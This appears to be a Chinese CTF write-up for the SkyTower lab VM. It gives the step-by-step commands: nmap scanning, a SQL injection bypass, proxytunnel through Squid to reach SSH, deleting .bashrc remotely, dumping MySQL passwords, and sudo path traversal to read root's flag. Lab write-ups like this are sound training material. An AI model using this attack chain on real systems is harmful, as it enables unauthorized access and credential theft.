SkyTower靶机:
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.168
2.nmap扫描端,口扫描到22和80端口,访问80端口:
nmap 192.168.225.168 -sV -sC -Pn -n -v -T5 -p-
?
但是注意:这里的22端口被过滤了,百度查询squid发现这个是用来设置代理的
3.现在访问一下网站,看到登录框,测试发现存在注入漏洞:
4.因为过滤了and,将其替换为||
123' || 1=1#
5.爆出一个john的用户名和密码,并且提示需要ssh进行远程登录:
Username:john
Password:hereisjohn
6.经测试ssh无法进行远程登陆,猜测该账户为内网账户,所以考虑设置代理进行穿透:
proxytunnel -a 1234 -p 192.168.225.168:3128 -d 192.168.225.168:22
-a 指定本地侦听端口
-p 使用代理IP和端口
-d 指定访问的目标和端口7.连接目标靶机:
ssh john@127.0.0.1 -p 1234
连接成功但是立马就退出了,推测应该跟该用户下的.bashrc文件设置的内容有关。
补充知识点:
.bashrc文件主要保存个人的一些个性化设置,如命令别名、路径等。也即在同一个服务器上,只对某个用户的个性化设置相关。它是一个隐藏文件,需要使用ls -a来查看。
.bash_history? ??记录之前输入的命令
.bash_logout? ???当你退出时执行的命令
.bash_profile??? 当你登入shell时执行
.bashrc????? ?????当你登入shell时执行
后两个的区别:'.bash_profile'只在会话开始时被读取一次,而'.bashrc'则每次打开新的终端时,都要被读取。
这些文件是每一位用户对终端功能和属性设置,修改.bashrc可以改变环境变量PATH、别名alias和提示符。
除了可以修改用户目录下的.bashrc文件外,还可以修改如“/etc/profile”文件、“/etc/bashrc”文件及目录“/etc /profile.d”下的文件。但是修改/etc路径下的配置文件将会应用到整个系统,属于系统级的配置,而修改用户目录下的.bashrc则只是限制在用户应用上,属于用户级设置。两者在应用范围上有所区别,建议如需修改的话,修改用户目录下的.bashrc,即无需root权限,也不会影响其他用户。
8.发送命令查看.bashrc文件,可以查看到最后一行有exit命令,这会在连接之后立马退出
ssh john@127.0.0.1 -p 1234 cat .bashrc
9.把这个文件删除即可成功登录:
ssh john@127.0.0.1 -p 1234 rm .bashrc提权:
1.sudo -l无法查找到提权信息。
2.这里还有一个思路就是查看数据库账户密码,前往网站目录,在login.php里发现了mysql的登录用户及密码
cd /var/www
cat login.php
3.登录数据库查看信息:
mysql -uroot -proot
show databases;
use SkyTech;
show tables;
select * from login;
4.查看到sara和william用户的密码,使用sara进行远程登陆(先删除他的.bashrc文件)
ssh sara@127.0.0.1 -p 1234 rm .bashrc
ssh sara@127.0.0.1 -p 1234
sudo -l
5.检查sudo权限,发现可以使用cat和ls命令,所以可以使用相对路径直接读取root根目录下的flag.txt
sudo cat /accounts/../root/flag.txt